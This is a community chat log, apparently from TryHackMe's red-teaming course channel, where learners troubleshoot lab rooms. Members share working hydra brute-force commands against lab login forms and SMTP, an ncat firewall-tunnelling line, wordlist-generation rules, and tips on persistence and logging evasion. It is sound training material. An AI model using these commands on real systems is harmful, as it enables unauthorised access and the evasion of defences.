#red-teaming-path

1 messages · Page 3 of 1

torn lodge
#

Evasion using Port Tunneling me is evading me right now... can't navigate to the IP on the browser as indicated using the tunnel I built on the terminal. I'm using the AttackBox btw

#

I just swapped the ports on the question as indicated on thencat -lvnp 443 -c "ncat TARGET_SERVER 25"line

torn lodge
#

sent it over to the form and navigated to the site on the port that is not allowed to send traffic to our network and... well, it times out

jade flume
#

Hello mate I’m trying to get done with lateral movement but while I set my DNS restart the systemd but the me look won’t resolve to the IP I set neither will the creds accessible anything I’m suppose to be doing that I’m missing ?

#

I’m using the inbuilt ATTACKbox too

torn lodge
#

The thmuser3 on Windows Local Persistence Task2 is refusing to login

#

I made the necessary changes to the RID for hijacking as instructed

#

I tried both evil-winrm (using both password and hash) and remmina from the AttackBox but no dice on any

slate kiln
#

Hello, I have a problem by opening shell.aspx in Persisting Through Existing Services

dusk berry
#

Finally I completed My Red Team Certification @low igloo

dusk berry
wheat osprey
charred sparrow
#

Hey guys I'm stuck at red team password attacks task 8 1. I used every possible password to login ftp but none of them contain flag. Can anyone help me?

charred sparrow
velvet root
#

It says you don't need to brute force. How else can you get in ftp without brute forcing?

charred sparrow
#

I tried anonymous login

#

I tried default passowrs

velvet root
#

I just went back and tried again and I was able to get in with anonymous

charred sparrow
#

yes but there is no flag

velvet root
#

Yes there is

#

Look through all folders

charred sparrow
velvet root
#

Yes, it's in the directory listed in there

charred sparrow
#

OMG.

#

I didnt see files folder

#

how stupid I am 😄

velvet root
#

Not stupid at all. Sometimes we tend to overthink things

charred sparrow
#

Thanks man 🙂

velvet root
#

You're welcome

slim fern
#

Enumeration room task5 question 1 dig command dosnt work with -t AXFR any help?

velvet root
#

What do you mean it doesn't work? What happens?

torn lodge
slim fern
#

; <<>> DiG 9.18.0-2-Debian <<>> -t AXFR redteam.thm@10.10.41.68
;; global options: +cmd
; Transfer failed.
                     

manic umbra
# torn lodge Did anyone have any issues with this?

a lot of people. Check that you replace the hex number, not add. There has to be a 00 at the number 3 at offset 30, not 03 or something else. Restart the machine, use xfreerdp or remmina, winrm won't work. Try both

velvet root
manic umbra
velvet root
#

Well, yes. Thats what I mean though

torn lodge
#

@manic umbra I tried both winrm and remmina on the AttackBox but next time I go for it I will make sure to replace he hex, and not add. I'll let you know how that goes

manic umbra
timid anchor
#

I think i'm doing it correctly but my password list is prohibitively large

#

ETA is like 2 hours

royal void
#

if shadow checked the right list

timid anchor
#

thanks, that's how large mine is as well.

royal void
timid anchor
#
hydra -t 64 -T 128 -l burgess -P pass.lst 10.10.56.25 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f
#

the -T gets downgraded to 64

royal void
#

shadow sees an error

#

you should be attacking the post form for burgess

timid anchor
#

yeah i see it

#

lol

#

thank you!

royal void
#

no problem

jade flume
#

Hello mate, please I need help with lateral movement task 7 Tunneling complex exploits, the putting whole command together part is confusing and I’m having hard time getting over it I’m I suppose to ssh using the username I login with by replacing tunneluser@attacker_Ip , if no I keep getting prompt to input a password after the initial command what I’m I doing wrong need some help thanks

timid anchor
thin irisBOT
#

Gave +1 Rep to @royal void

royal void
jade flume
timid anchor
#

@royal void I guess I spoke too soon. I was getting a false positive. Here's my new command that I'm trying and it still has a very long ETA

hydra -t 64 -T 64 -l burgess -P pass.lst 10.10.56.25 http-post-form "/login-post/index.php:username=^USER^&password=^PASS^:Incorrect username or"

Does this look correct?

royal void
timid anchor
#

Is there a good reason to fail on success instead of failure?

#

It did work. I'm just curious why my method doesn't work.

royal void
thin irisBOT
#

Gave +1 Rep to @royal void

slim fern
#

+rep @velvet root he helped me on DM

thin irisBOT
#

Gave +1 Rep to @velvet root

river minnow
#

Does anyone know a good place to ask about what appears to be a problem in the "Breaching Active Directory" room? I can't seem to connect to what appears to be the DC host as (well, anything, but also) a DNS server.

river minnow
thin irisBOT
#

Gave +1 Rep to @native berry

raven lynx
#

Can anyone help me with c2

royal void
#

sure if you explain what your problem with it is

raven lynx
#

Even tried ssh

#

Got it… solved

royal void
#

what does that have to do with the C2 room???

raven lynx
#

Dns dude

timid anchor
#

I'm working on https://tryhackme.com/room/enumerationpe -- Task 5, Q3 -- It seems that snmpcheck is taking a long time to enumerate.. is this expected?

Command I'm using:

snmpcheck-1.9.rb 10.10.115.159 -c public  
#

and output so far:

snmpcheck.rb v1.9 - SNMP enumerator
Copyright (c) 2005-2015 by Matteo Cantoni (www.nothink.org)

[+] Try to connect to 10.10.115.159:161 using SNMPv1 and community 'public'```
#

I figured it out -- I'm not sure why, but I had to start snmp manually using

net start snmp
timid anchor
timid anchor
#

I had this problem as well. I ended up just hosting an ftp server on my kali machine and uploaded it via ftp from the windows machine.

glad jackal
#

Hi can anyone help me out with the network configuration of Breaching Active Directory, i have updated /etc/systemd/resolved.conf but after running nslookup thmdc.za.tryhackme.com i'm getting this output

ember granite
#

...

rough patrol
#

any ideas?

#

data exfiltration task8

primal nimbus
rough patrol
#

still the same error

primal nimbus
rough patrol
#

I also tried with simple pip

sullen ferry
#

hi!
i am wondering about this red teamer title. is it optainable after 21. september? also, can you choose which title do you want to use or are you just red teamer after that?

#

got answer thx

hearty pasture
#

Am I missing something here? Lateral Movement and Pivoting room - Task 3: Spawning processes remotely

hearty pasture
charred sparrow
#

hey guys

#

I'm getting error in power shell: Invalid namespace

#

command is: Get-CimInstance -Namespace root/SecurityCenter2 -ClassName AntivirusProduct

#

room: the lay of the land -- Host Security solution1

#

Solved

wide parcel
ebon escarp
#

@echo ore could you please add me as a friend here on discord? I'd like to have a chat about the great lateral movement room 🙂

solar coral
#

Anyone having any issues with flag13 in Windows Local Persistance? Follow the steps but it still want's to only get flag12 and not allowing flag 13 to be grabbed

stuck haven
#

hi

#

I need help for taske 6 of password attack

#

red teaming room

solar coral
stuck haven
#

Yes

vast quest
#

The hint is so close to the answer.

stuck haven
#

But I tried it is not right

#

really?

solar coral
stuck haven
#

Ok I see

#

BUt I tried with it

#

but stil not get the right answer

solar coral
#

This is useful - ^[!@#$] add a special character at the beginning of each word. ^ means the beginning of the line/word. Note, changing ^ to $ will append the special characters to the end of the line/word.

stuck haven
#

Ok

#

I tried but didn't get the right answer

subtle mango
#

Finished the path today and got exactly 400 rooms finished. Still enjoying the leaning journey. Thanks for the nice content! 😉👍

lucid plume
#

somebody doing obfuscation? trying to understand code from task 7. if the reminder of 3 is equal to 1, how the code enter to the switch statement?

jade flume
#

Any one up ?

round hornet
#

Not sure what's going on here...

#

This is the Intro to C2 where we set up the apache2 proxy.

native berry
tall halo
#

these ad rooms are top quality @white prairie i think i finally get golden and silver tickets now 😄

zealous wind
round hornet
#

even for a listener?

native berry
velvet root
#

Anyone win any cool prizes with their tickets yet?

vast quest
royal void
vast quest
#

However, I think I got the Pineapple.

lament cipher
#

guys, i'm stuck with task 4 in sandbox evasion room, none of options is ok, anyone can help me?

velvet root
lucid plume
#

somebody doing obfuscation? trying to understand code from task 7. if the reminder of 3 is equal to 1, how the code enter to the switch statement?

robust skiff
#

I ran the code and got the flag

lucid plume
robust skiff
lucid plume
#

cause is true right?

robust skiff
#

yes

lucid plume
#

then enter in the ecuation

robust skiff
#

yes

#

x=x*3+1

lucid plume
#

then x = 10

robust skiff
#

yes

lucid plume
#

so haow enter in the next if, if x !== 1?

robust skiff
robust skiff
#

that's the idea of using the collatz problem

#

the x=10 will keep going in the loop because the condition of the while while (x>1) is true

#

at the end x will reach 1 and the condition of if(x==1) will become true

lucid plume
#

what end?

robust skiff
#

some loops

#

like four five times

lucid plume
#

first time is 10, then from there it will incresase the number

#

dont understanding how the reminder become 1

robust skiff
#

after 5 loops the reminder will become 1...

lucid plume
#

ah.. got it

lucid plume
#

and sent it to the boot

robust skiff
static scroll
#

can someone explain to me why i should do data exfiltration when i can simply copy and paste data through ssh?

native berry
molten summit
untold fjord
#

how for into the red team path are you guys? I'm still in the fundamental modules :c

round hornet
#
msf6 post(multi/manage/shell_to_meterpreter) > run
[*] Upgrading session ID: 1
[-] Target is running Windows on an unsupported architecture such as Windows ARM!
[*] Post module execution completed
#

Can't get meterpreter

#

and I had no idea Windows had an ARM version

#

Certutil doesn't seem to work. I'm just trying to upload man...

main oyster
#

have u tried powershell -c 'wget ...'

round hornet
#

can't even run the damn thing

#

ok, nothing is running...

#

big surprise

round hornet
main oyster
round hornet
#

Not sure, but it hasn't worked. Had to restart Armitage 4 times after shell/target stops responding. Powershell never runs.

#

and the ARM error has me confused

torn lodge
#

In Task 5 of Windows Local Persistence (Abusing Scheduled Tasks) I get the reverse shell but it refuses to execute flag9.exe as if I were missing something... and I just recreated it with a difference service trying to run as SYSTEM but still no flag 9... any ideas? got it

round hornet
#

I'm just going to run on msfconsole, see if that works. So far, Armitage is very disappointing.

#

yup... works. Go figure.

#

there's gotta be a better free option. Or perhaps it's something on my end. I don't really know.

round hornet
#

I'll give Empire a try

#

Msf is alright, just this thing...

robust skiff
robust skiff
round hornet
robust skiff
round hornet
#

already mentioned those. Didn't work.

#

It's fine. It was Armitage. It's broken, at least for me.

robust skiff
#

did wget result errors?

round hornet
#

They all work just fine through regular Msf. Not with Armitage was my point.

robust skiff
#

it doesn't run the exploit?

round hornet
#

No, it runs the exploits but the shell seems to be really unstable, for some reason. Not sure if it's my system or the program.

#

I've requried a restart about 5 times. What should have taken 10 minutes took me 3 hours...

#

Major pain in my ass... lots of hoing and humming...

#

and deep-breathing techniques

robust skiff
#

because the reverse shell wasn't crashing with me

#

unless you tried to upgrade to meterpreter

round hornet
#

I installed via apt but either way, i would like to try other C2's

#

So, if it's not up-to-date then I must be crazy, heh

#

I haven't liked it from the beginning. That module took me 2 days to complete NotLikeThis Eventually, just used msfconsole and it went perfectly

robust skiff
#

nice

#

then just try another

round hornet
#

yeh

robust skiff
#

I need hint for room Signature Evasion task 2 To the nearest kibibyte, what is the first detected byte?
I don't know what does it exactly mean

raw dust
#

What is the base addresWhat is the base address for the ETW security check before it is patched?

#

This two question is very wrost in tryhackme task

zinc quiver
#

hi there, please anyone could let me know how to make Teamserver (Armitage) work? :S I've tried couple things but nothing really works...

molten summit
#

I also gave up on Armitage on that room. I think maybe Armitage + msf6 have an issue. Which isn't too surprising as I think Armitage is going to be stagnant from now on.

#

I didn't try it, but someone industrious could try using something like kali 2020.

#

Or downgrade msf6.

zinc quiver
#

yeah what a shame :(, just completing the room with armitage from apt and msfconsole.

robust skiff
#

I think I am lucky for not having such issues with armitage

gritty coral
#

Can I ask if I want to have red teamer title in Tryhackme, do I need to finish the path before 22nd?

feral sage
#

BUT: "The ticket promotion ends on the 21st of September 2022, 11:59 PM BST!"

celest vessel
#

so you'll have to hurry up 😅

feral sage
#

😂

primal kernel
#

In task 8 question 3 I am unable to get a successful login.
I am using the cewl wordlist with a min length of 3 and depth of 10. I've tried a few different rules but the hint seems to say to use the clinic.lst which was the name of the cewl file.

#

anyone have advice? I'm starting to think it's the username phillips that is incorrect.

#

Oh, this is for the password attacks module btw.

royal void
#

it is not a module it is a room but okay lets start here

primal kernel
#

Thank you for the correction @royal void

thin irisBOT
#

Gave +1 Rep to @royal void

royal void
primal kernel
#

366

royal void
molten summit
#

10 might be too short, unless the instructions crafted your cewl command with that.

royal void
#

i.e your list is to large

#

it should be about 3 times smaller

primal kernel
#

ok, now it is 105

royal void
#

then now try using hydra for the phillips account

primal kernel
#

|| hydra -l phillips -P /tmp/clinic.lst 10.10.188.101 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed"||

#

I ran that, no successful login

royal void
primal kernel
#

Yes, 16 passwords found in that case.

#

changing back to F I get nothing. So either the username is wrong, or the password list is incomplete?

royal void
#

which is placed at the end of the command

primal kernel
#

||hydra -l phillips -P /tmp/clinic.lst 10.10.188.101 http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed" -f Hydra v9.2 (c) 2021 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway). Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-09-20 15:10:14 [DATA] max 16 tasks per 1 server, overall 16 tasks, 105 login tries (l:1/p:105), ~7 tries per task [DATA] attacking http-get-form://10.10.188.101:80/login-get/index.php:username=^USER^&password=^PASS^:F=Login failed 1 of 1 target completed, 0 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-09-20 15:10:21||

#

lol sorry for the messy output...0 passwords found.

royal void
#

wonders if nobodynate got it now

#

@primal kernel got it???

primal kernel
#

Sorry had to afk for a min. I did run with S and the first job on each threat returned success. I got 16 successful passwords with S

royal void
#

bonk

#

fine lets just give you the correct command so you can compare

#

||hydra -l phillips -P clinic.lst 10.10.x.x http-get-form "/login-get/index.php:username=^USER^&password=^PASS^:S=logout.php" -f||
you will need to change the ip but other then that it should work

primal kernel
#

woah, that's odd

#

It worked...but I'm extreemly confused why

#

How would someone know a success will redirect to logout.php without already logging in successfully?

royal void
#

the -f states to only use the first correct results and disregard any others

royal void
primal kernel
#

well thank you for your help @royal void . I still think this is quite a jump for someone to make but I appreciate you helped me get through it.

thin irisBOT
#

Gave +1 Rep to @royal void

royal void
#

no problem

#

might be easier if you know how hydra can be finicky

primal kernel
#

oh, I've never heard of hydra being finicky. I'll have to read into it more.

grizzled viper
#

I need som help in the Password Attacks room with the Hydra tool, when i try the SMTP i get SMTP LOGIN AUTH, either this auth is disabled or server is not using Auth.

#

have i missed some arguments in hydra ?

royal void
grizzled viper
#

and i have tried with smtp://10.10.10.50:25

royal void
#

hydra -l pittman@clinic.thmredteam.com -P custom.lst smtp://10.10.48.200 should work if you replace the ip address

grizzled viper
#

where is custom.lst ?

royal void
#

that is the name of the wordlist you made with the john command

grizzled viper
#

dont i need to replace that to my wodlist file i have created ?

royal void
#

yeah you would need to replace that too

#

oversight by shadow there

#

if it still does not work could you do wc -l nameofyourwordlist and tell shadow the number???

grizzled viper
#

2800

royal void
#

that is way to short

grizzled viper
#

then i need to backtrack my steps, but i still get the error on the SMTP Login Auth

#

should it not just say it failed ?

royal void
#

¯_(ツ)_/¯

grizzled viper
#

or is it couse i dont run as root ?

royal void
#

no you should not need root for this as it should work fine without

grizzled viper
#

is 5600 a better result for the wc -l ?

royal void
#

better yes.... enough for it to be as long as it is supposed to be??? no

#

shadows list is a 21000 lines

grizzled viper
#

iam i doint the john part wrong

#

english is not my main lang and i have dyslexia so i am use to do some misstakes becouse i dont understand all completly

royal void
#

fair

#

the rule you should be using with john should look like Az"[0-9][0-9]" ^[!@]

grizzled viper
#

well it does i think, let me check

royal void
#

and then to generate the list you do john --rule=thm-rule-name-here --wordlist=clinic.lst --stdout | tee name-of-new-wordlist.lst

grizzled viper
#

my rule is Az"[0-9][0-9]" ^[!@$#]

royal void
#

huh why did it make a smaller list then....

grizzled viper
#

is my clinic.lst to small then?

#

i runt cewl with -d 8 -m 5

#

run -t

royal void
#

cewl -m 8 -w clinic.lst https://clinic.thmredteam.com/ is the command you should have used for the clinic.lst

#

as it states for you to do in task 7

grizzled viper
#

that resultet in the first list that only had 2600

#

wonder if my firewall blocks the page

royal void
#

the clinic.lst is 105 lines long

grizzled viper
#

i really think my fw blocks the page 😄

royal void
#

maybe

round hornet
#

Mmm.. I have a VBScript that runs calculator but it doesn't want to with cmd.exe. Is AMSI or something preventing this?

royal void
#

because some cmd instances showed up in taskmanager when shadow tried

round hornet
#

Well, that's not helpful...

#

not you, the script.

#

The script isn't helpful...

#

yup... they're all there on task manager firRly

#

just floating around

#

It wouldn't give me NT AUTHORITY anyways, would it?

#

Wscript probably runs as the user

royal void
#

not sure

grizzled viper
# royal void the clinic.lst is 105 lines long

Its my parrot install thats is messed up. If i run it in the attackbox it works and i get more result. if i run cewl in my vm kali i get more. its a local issue but thank you very much for you help. My brain needs this exersice or how its spelled 😄 Thank you!

thin irisBOT
#

Gave +1 Rep to @royal void

royal void
#

no problem.... glad you could figure it out

#

maybe it is some cewl version error or something else is the cause

grizzled viper
#

It could maybe be a version issue with hydra as well as i get these strange errors. but i will check that tomorow after work 😄

olive cedar
#

Anyone else facing problem in attack box in data exfiltration task 8 , unable to netplan apply

grizzled viper
#

Try it with kali machine instead

olive cedar
#

Tried but I feel my configuration is not set . Not getting the correct ip for flag.thm.com

ripe basin
#

Anyone completed Task 10 (Real World Scenario) of Evading Logging and Monitoring?
I can't get it thru' after more than 5x tries....
Already checked but still got caught...

#

Please share. Thanks

molten summit
#

Only one more section left: Host Evasions!

torn lodge
#

K... this is a n00b type question but here it goes: In the 'Signature Evasion' room Task 2 'Signature Identification' it says we should use the native tools head, dd, and/or split. These are native to Linux, and the files (e.g. shell.exe) are on the Windows machine. How did you transfer the files from the Windows machine to the AttackBox?... please be nice LOL

main oyster
torn lodge
#

I tried scp but it refused to connect via 22

#

I will try it again later. Thanks @main oyster for the suggestion!

thin irisBOT
#

Gave +1 Rep to @main oyster

main oyster
torn lodge
#

I don't think it was when I did the nmap scan... I had tried to connect via smbclient but the user has no workspaces available, this why I asked here... kind of out of ideas on this one

ripe basin
torn lodge
#

That would work well if the files were on the AttackBox to get them from the Windows machine... but this is backwards...

#

or maybe I'm getting the room wrong. The files are in the Windows machine (i.e. shell.exe) and the tools it talks about being native are native to Linux... i.e. split, head, and dd

#

Signature Evasion Task 2 - Signature Identification

#

thanks anyways @ripe basin for taking the time to answer

thin irisBOT
#

Gave +1 Rep to @ripe basin

ripe basin
raw dust
#

Heyy
What is the base address for the ETW security check before it is patched ? Evading logging and monitoring room

tawdry gull
#

I've logged into attackbox through the browser, setup armitage, scanned for hosts but there aren't any Windows hosts, just 8x Linux machines (including the attackbox). Any ideas on what I'm doing wrong?

native berry
half bramble
#

What up peeps

#

decided to make it a point to have discord open when studying

#

Gets me in the community i guess

#

if that makes since

pearl wave
half bramble
pearl wave
#

ah

#

good luck

tawdry gull
zealous wind
#

on Evading Logging and Monitoring: Task 10. I'm running the gpp-bypass.ps1 script clear event logs run the agent.exe file and I still get the Traffic halted, you got caught the message. when checking the registry I do see the values are 0 meaning logging is disabled, so how when running the script I can still see logs in Microsoft/windows/PowerShell/operational?

#

I also disabled the Scriptblock logging via gpedit.msc and I can still see logs when running agent.exe 🙂

grizzled viper
# royal void ¯\_(ツ)_/¯

Now its fixed 😄 I needed to update ruby and after this both the cewl and hydra commands worked fine. Thanks again for you help and for giving me to redo my steps and eventually find my issue. the hydra command fixed the password in 1 sec 😛

thin irisBOT
#

Gave +1 Rep to @royal void

native berry
#

That should then give you a box like that, where you can find the target machine IP:

zealous wind
tawdry gull
thin irisBOT
#

Gave +1 Rep to @native berry

ripe basin
#

And it is the last task in Red Teaming path...

zealous wind
#

yeah, strings etc.....was next on my list 🙂

fast reef
#

Anybody have problems with Network Security solutions task4 and Task5 in task5 it says i should be able to access port 8080 on box spawend in task4 but inaccessible and reported as closed with nmap

#

never mind just took a while for the service to start.

royal void
fast reef
#

The network in Breaching Active Directory seems fubard atm, cannot ping or resolve thmdc.

fast reef
#

its started and its pointing to the thmdc ip 10.200.55.101

#

okay iot was started i just stepped away for 30mins

wind boneBOT
fast reef
#

now i just started it again

#

but still no resolve.

#

had to double restart systemd >< any hoo, here we go again i will be back if further issues come up

ripe basin
#

Wow... thanks @weak ice 👍

thin irisBOT
#

Gave +1 Rep to @weak ice

calm gyro
#

Hello, in Windows Local Persistence Task 2. I added the thmuser1 to the Backup Operators and Remote Management Users groups, but I still can not connect via rdp. Is there other password for this user instead of Password321?

vital crow
unique mesa
grand heart
#

https://tryhackme.com/room/winadbasics im on Task 3
What would be the name of the machine account associated with a machine named TOM-PC? im looking over the active directory and existing machines use PC-<name> LPT-<name> SRV-<name> or SVR-<name> but none of that works with TOM? its supposed to be 7 letters

grand heart
#

lol solution was trivial simply $ at the end

#

heads up seems like some of the rooms will have access expire in 2-3 days in the ad section

calm gyro
native berry
#

Show a screenshot pls

naive hollow
#

Anytime i submit a flag for the OPSEC room , i get a confirmation it's the correct answer but the task doesn't get marked as completed even when all the questions are answered.

#

eg: Task 2 is answered but doesn't show as completed.

halcyon flame
#

I'm having issues starting the Windows box for Protecting and Stripping Identifiable Information. The box is grayed out. I terminated both machines because I was finding problems, but when I restarted the machine the Windows machine won't start but the Ubuntu attackbox restarted. Is there a reset option?

#

I'm just gonna install the compilation toolchains locally and then when the Windows box can start again i'll upload it.

halcyon flame
#

Never mind. Solved. Outside of CreateRemoteThread function you can just take the other indicators and use echo -n maliciousHandle | rev to auto-generate new handles and it’ll work. I didn’t realize I just had to navigate to the IP to submit the exe file

echo ore
#

The correct progid is txtfile, not textfile. You have an extra E

white thunder
raw dust
#

How to check who is winner of red teaming path

vast quest
zealous wind
#

Room:Firewalls Task:7 does anyone gets the ncat tunneling to work?

zealous wind
#

well, i assume the port forwarding is done on the same server so the listening port of 8008 is the same as the forwarded port (for any other port I'm getting connection time out (that tells me the FW blocks the connection) but i can't get that to work

vast quest
#

I used nc on a different port. 🙂

zealous wind
vast quest
#

Are you doing it just now?

zealous wind
#

yes

vast quest
#

VM or Attackbox?

zealous wind
#

attackbox

vast quest
#

Infact I'll test it in attackbox, it shouldn't be different,

zealous wind
#

the connection just times out

#

which makes sense if there is a FW blocking all other ports

vast quest
#

So you see

Ncat: connection from IP:Port ?

zealous wind
#

im using ncat -lvnp [port] -c "ncat localhost 8008" on the web form

raw dust
vast quest
vast quest
zealous wind
zealous wind
raw dust
spark prairie
#

hello+tickets3@tryhackme.com

vast quest
#

You're both mixing yourselfs up with isn't helping lol

#

@zealous wind
nc -lvnp 21 in a terminal window first
ncat attackboxip 21 -c "AttackboxIP 80" Firefox window

vast quest
# raw dust No

If you E-mailed during the event for the big prizes, you'll be E-mailed back within 2 weeks.

raw dust
#

Ok

vast quest
#

@zealous wind have you done the steps?

zealous wind
vast quest
zealous wind
#

so i should be expecting a shell from the remote server?

#

cause im not getting one 🙂

vast quest
#

Can you share a screenshot?

zealous wind
#

attackbox

vast quest
#

You have one DO these steps.

prime knot
#

I cannot received the 9th flag... however I run the schtask reverse shell and deleted the reg value

zealous wind
#

web form

vast quest
#

GET / HTTP/1.1 hit enter
host: default enter

On the terminal that is listening

zealous wind
vast quest
#

Hit enter twice more

zealous wind
vast quest
#

Screenshot?

zealous wind
# vast quest Screenshot?

this is the command i put in the webform on the remote server ncat 10.10.110.204 -c "10.10.110.204 21"

vast quest
#

No.

#

ncat 10.10.110.204 21 -c "10.10.110.204 80"

zealous wind
vast quest
#

Did you not get a connection on the nc?

vast quest
gilded edge
#

I am facing a problem in the password attack room in task7
I am supposed to create a word list from. The website

clinic.thmredteam.com

But this website isn't available!

orchid swift
charred sparrow
#

Hi guys I cannot connect to lateral movement network. I used attackbox kali vm and my own machine and none of them did not connect to network
ROOM: Lateral Movement and Pivoting

white current
#

How to change permissions in iis apppool Windows Local Persistence room flags.exe

#

I was not understanding please help me

molten summit
#

I don't recall needing to change permissions in the iis apppool?

#

You need to run something in the web server with its permissions.

fresh cipher
#

is there anyone using hashcat on windows to help me with the installation?

molten summit
vast quest
vast quest
#

Can you cat

/etc/resolv.conf

charred sparrow
vast quest
#

10.200.19.101 needs to be above your nameserver.

#

Either that or you can delete 192.168.0.1 all together, just need to remember and change it back

grand heart
#

im on the exploiting ad room working on task 8 and i ran the necessary commands but keep getting told that \thmrootdc.za.tryhackme.loc\c$\ doesnt exist. ONe thing that im not sure of atm is when you run kerberos::golden /user:Administrator /domain:za.tryhackme.loc /sid:S-1-5-21-3885271727-2693558621-2658995185-1001 /service:krbtgt /rc4:<Password hash of krbtgt user> /sids:<SID of Enterprise Admins group> /ptt i noticed that the previous command lsadump::dcsync /user:za\krbtgt doesnt give me an rc4 hash ? not sure which hash im to use

royal void
grand heart
#

rgr that leave it for me to assume this be right just because its on this path 🙂

manic umbra
#

Seems I'm doing something wrong in https://tryhackme.com/room/signatureevasion Task 2, manual signature identification.
When I upload the shell.exe, I get an alert. If I split the file in half with split --bytes 36901 shell.exe and upload both halfs, I don't get any alert. I suppose the signature wasn't right there at the half and I splitted it 😄 Am I using the tool wrong. Any other tool I should use ?

#

oh, forgot, yes, I moved the files in a folder that are not excluded from defender, it detects shell.exe after all (c:\uploads)

candid ivy
#

I'm stuck on Task 4 in the Passwordattacks room

#

I Thought i was putting the right crush commands and it even works in terminal but the question is saying I'm wrong:
"crunch 5 5 -t THM@! -o tryhackme.txt"
What am I missing?

gilded edge
orchid swift
#

Thanks @gilded edge

thin irisBOT
#

Gave +1 Rep to @gilded edge

tawdry inlet
#

I don't get where we're seeing that Doman Users has the AddMembers ACE?

#

Just Generic Write

pearl adder
#

Hi, i'm doing the Enumeration room,
I never found any port higher than this number highlighted and it is not accepting it
is there anything wrong ?

#

I used the command "sudo netstat -tlp"

vast quest
#

No, there definitely is one bigger.

#

Plus that answer has hinted its a 4 digit port

pearl adder
#

oh i found the correct command to be "sudo netstat -tlpn" to show the numeric port number instead of port name

cyan stream
#

I am currently in the Password Attacks room and I am trying to run the "cewl" command on https://clinic.thmredteam.com/ and I keep getting "Unable to connect..." errors - is the site down? I am connected using my own Kali VM over OpenVPN.

cyan stream
thin irisBOT
#

Gave +1 Rep to @orchid swift

brisk path
#

Hey everyone, the domain issue is being investigated. Thank you for your patience

glossy sandal
#

any suggestions?

stoic junco
#

Guys anyone knows,
Where i can download free active -directory pen testing videos

candid ivy
#

That was it. Thanks for the tip!

thin irisBOT
#

Gave +1 Rep to @weak ice

brisk path
feral sage
# glossy sandal any suggestions?

imo you could start after the first three listed ones. And always have an eye on the recommended knowledge mentioned in the beginning of each room, sometimes there are suggestions and references to other rooms

calm gyro
#

Hello, I get this error in Data Exfiltration room Task 6. Can somebody take a look?

thin irisBOT
#

Gave +1 Rep to @feral sage

remote maple
#

hey, i'm working on persistance task 6 flag 13. I set the environment variable as described in the task, pointing to my shell but i can't receive a connection back. Somebody else faced this issue and knows a fix?

native berry
native berry
native berry
# remote maple Yes i did ...

Did the previous section for winlogon work fine, so you are using the same attacking machine as for that previous section?

#

I guess you either double check all the settings for you msfvenom payload, especially to use the exe format and not exe-service

#

Or might want to try to restart the target machine and start all over

remote maple
#

previous tasks worked fine

#

msfvenom command is correct

native berry
remote maple
native berry
#

K, might want to check ip a s if you have just a tun0 interface or any extra like tun1, tun2 etc.
If that's also not the case and it's not working with the attackbox either, I can only think of some sort of issue with the payload you generated

remote maple
native berry
#

I recently did that room too and that task was working just fine

native berry
remote maple
native berry
calm gyro
#

Hello, in Windows Local Persistence Task 2 Special Privileges, when I open the window permissions from powershell, I can not see my thmuser2 there

calm gyro
#

I still have a problem. First, when you work with secedit and export the config file, do I have to edit that one from the Administrator home directory?

native berry
calm gyro
#

Ok, I still have some problems, but I think is because I restarted the machine. I will try again in a few hours, thanks!

wary raven
#

Hi, i don't know if im doing something wrong but in the third part of the second task of Windows Persistance i have to open the Windows Registry acording to a path

#

Which is HKEY_LOCAL_MACHINE > SAM > SAM > Domains ...

#

But in the Registry Editor of the prepare machine of the room doesn't appear the Domain directory

#

Any suggestion?

#

Ahh sorry

#

i forgoted run it with PsExec64 heheh

calm gyro
thin irisBOT
#

Gave +1 Rep to @native berry

outer light
#

Does THM Stopped Giving Tickets For Red Team Path?🙂🔥

wanton nacelle
#

Yes

jagged anvil
#

I've recreated this, terminated the entire network and started over, and I always end up back here. So, what am I doing wrong?

feral sage
wary raven
#

Hi! I can't retrieve the flag9 form the 5th task of the persistance room, i have repeat the whole process twice and i still don't get it

#

i was likely to think that it could be my fault but, the process seems prety simple to be my mistake two times so i think that something is wrong

#

Someone can help me with the flag?

royal void
# wary raven

did you remove the thingy in the registry and then query for it on the main account???

wary raven
#

You mean the SD file?

#

Yes opening the Registry Editor as SYSTEM with PsExec64

#

and then i query it and it gives me an error

royal void
#

hmmm

wary raven
#

Nobody have the flag?

royal void
#

shadow has the flag but just sharing it outright is kinda not allowed

wary raven
#

im understand 😦

royal void
#

still think it might be something you missed or did wrong but dunno what

wary raven
#

I think that i will continue with the path and i will come back later in time

royal void
#

yeah that is a good idea

wary raven
#

yes, thanks any way!

echo ore
# wary raven

Sorry for the kind of cryptic errors there. Your issue seems to be you haven't removed the SD registry entry. If you just deleted its contents, the flag validator might complain.

outer light
#

Does The Red Team Event Ended?🙂🔥

main oyster
wary raven
thin irisBOT
#

Gave +1 Rep to @echo ore

prime stone
#

What is the purpose of the quotes in THM passwordattacks room, task 4, question 2 for crunch?

native berry
carmine pier
#

tes

rustic egret
#

Hi i wanted to ask a question about evil-winrm

Am i correct by saying that it's SSH but on steroids? Its limited to Windows WinRm service only. But how is it able to do tasks like AMSIBypass so easily?

#

Also Powershell modules are pretty easy to load for in-memory execution..

empty coyote
robust skiff
#

WinRm is not a malware
it's windows remote management

empty coyote
#

The stuff on the image does NOT trigger a reverse shell, but doing the exact same thing in cmd.exe works. Anybody knows why?

robust skiff
empty coyote
#

they definitely do somthing different

robust skiff
#

no I don't think so

empty coyote
#

Still different hashes

robust skiff
#

it has nothing to do with this difference in echo
but maybe the difference is because of the end line character "\r\n" / "\n"

empty coyote
empty coyote
robust skiff
#

this should not happen

empty coyote
#

you mean the bat script breaking?

robust skiff
#

yes

robust skiff
lusty galleon
#

Is there an issue with data exfilitration room task 7 ICMP? Every time I run a command in the terminal it locks up and doesn't let me do anything for 2-5 minutes.

#

I've restarted numerous times killed all other connections. I'd really like to complete this without using the attack box.

still tundra
lusty galleon
half bramble
# wary raven

Recon the file maybe, look for strings in the file

#

im late

#

nvm

naive hollow
#

Hello guy's, is anyone also experiencing this issue while trying to RDP into any machine on the redteaming path?
Room: The Lay of the land

wary raven
thin irisBOT
#

Gave +1 Rep to @half bramble

velvet root
calm gyro
#

Hello, I can see that a lot of commands are done with psexec in the Windows Local Persistence room. How can you make these in a real life scenario?

calm gyro
#

